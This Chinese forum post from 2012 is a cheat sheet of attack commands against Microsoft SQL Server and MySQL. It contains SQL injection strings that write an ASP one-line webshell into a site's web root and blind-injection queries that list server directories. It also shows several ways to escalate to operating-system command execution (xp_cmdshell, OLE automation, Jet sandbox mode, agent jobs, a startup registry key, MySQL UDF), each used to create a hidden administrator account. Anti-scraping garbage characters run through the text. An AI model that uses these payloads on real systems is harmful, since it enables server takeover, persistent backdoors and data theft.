找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3027|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马" H6 X$ o- R" B% e2 W) P
首先确定网站的WEB路径7 O; u% K0 C9 ~" a: ]  Z; Z' Y
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马+ k: o# r: f6 W# ]: ^8 L
7 \7 ]$ K) [" j
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
- n8 Y4 O1 u# \5 ]//将一句话木马插入表中0 t/ c- y3 Y. h! \0 a% n! l

1 x- l8 \& y- h# h;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
- z8 R8 W' d% O2 N//导出一个ASP文件3 R3 a0 t. r; F+ z3 e
8 n! n2 K+ [: s: @, J( |, x$ o

' ?1 w- q9 d5 l( l关于MSSQL列目录
5 v; c- H  \" W+ _! e0 k;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表& G) F1 r6 F" J8 `' h: M- M
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表1 z7 q# E) O  c& ?3 w: Q

- v/ T$ H- e  ~9 I5 Yand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录1 }2 N5 c: @6 ]* K2 \7 F- T
7 Q# ^) q% O. k! a
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
  y+ h$ B9 [0 V- N6 ]$ ]) @' L/ Z( b7 o4 N- b' ?! J& m6 J
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
: e# R; e4 R. U  Q) q$ h* h, [& }7 [  K2 w7 a* A0 S, Y
/ j* ]8 z2 W1 B- ?1 E; q
数据库版本和权限查看
3 J& i' t* e0 `  K& L! ]and 1=(select @@VERSION) //查看详细的数据库信息.
! x1 y, \9 [& S) f: G3 h$ F  Qand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
5 h9 P' z- V+ d  Aand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
6 G8 u* B1 [% ]
* z6 y& _" S+ ]
' ]; j1 I1 v6 u. @1.利用xp_cmdshell执行命令5 I6 W6 T; y8 q+ B) k1 S
exec master..xp_cmdshell 'net user rfire 123456 /add'/ q6 g& n' _9 ~# p* H+ l/ P
exec master..xp_cmdshell 'net localgroup administrators rfire /add'8 b, E8 y8 o: v7 Q
( Q* i& y: {5 P1 |1 V
恢复xp_cmdshell存储过程9 @, }0 B1 H: T
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'# m* s6 f" N' r  u1 ]4 \
: K* c2 z3 ~2 s2 n0 j
% C, U* J# R% S/ ]. i; A4 n( _
2.利用SP_OAcreate和SP_OAMETHOD执行命令
7 B, L/ c. g5 g" h; }2 J在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下7 n8 r3 }( d; V/ a9 M8 b
DECLARE @shell INT //建立一个@shell实体
+ u$ v; Y4 m! X4 x) j: OEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
2 [: C6 _( E! L+ ?EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例/ p6 ~6 ~5 e$ ^. N: n. s6 d

5 ?. Q, J  U' s8 }7 E3 s' q
" a/ u0 c; V- Q) G3.利用沙盒模式
' |5 Q3 T2 h, O' D# w* L7 V, O先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
4 v. o& T- G! _  j开启沙盒模式:
$ F3 a& t: `3 ^5 f5 N( ^EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
5 X4 _" u3 p/ x$ C1 q, `4 U" }9 u) t/ M. F. z; o( r# u( O6 V9 c
执行命令:4 S! f1 Z5 y' h2 P
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
: ~! C$ y3 P; U( T6 ^7 a5 w" }, A8 \1 ]

) q3 k+ s3 U1 \$ g+ p4.利用SQL代理执行命令
. t% q. U$ i3 l/ r& K% QEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
* t; U) p9 X$ u' ?, X8 E. _: a
1 X. P2 S, z! D执行命令:* q6 b% d4 f# P3 X
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错! u* ~1 U6 v& |- q  K4 y; g) K
exec sp_add_job 'x'$ [  n# v, @$ ^/ X; ?
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
6 H8 G$ Z- F, w: A2 iexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业$ D/ q2 V1 `6 _7 l. d8 c
. H4 a4 X! b* d9 l$ N  p* j) m
4 W$ R! ?  G3 v2 b  F5 n
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
0 y( W* _$ Z9 Z) \% C7 P, y; lEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
) }8 s2 O$ M% D0 H3 A1 k
# ~0 E8 |% s& u' B# y8 H3 ?: ?' Z9 [$ h$ ?* I2 i4 [* ~
6.MYSQL的命令执行( N" W1 @5 _9 [" ?- i
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
% A9 P% U6 i' v1 l$ N% ?7 |* i首先要在su.php下导出c:\windows\udf.dll
0 N- h* q: L  |) n) Z5 w* j  I/ o导出后执行创建自定义函数命令:+ a. H/ E/ @5 a1 R$ H3 E$ m
Create Function cmdshell returns string soname 'udf.dll'3 g$ g3 q5 e" h& |
执行命令* j, G+ ~4 F) g! `% I! Z
select cmdshell('net user rfire 123456 /add')- M' @* g% v' f. X- v  v3 J+ f# E
执行后删除函数 drop function cmdshell6 t) u' ^+ e. t" w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表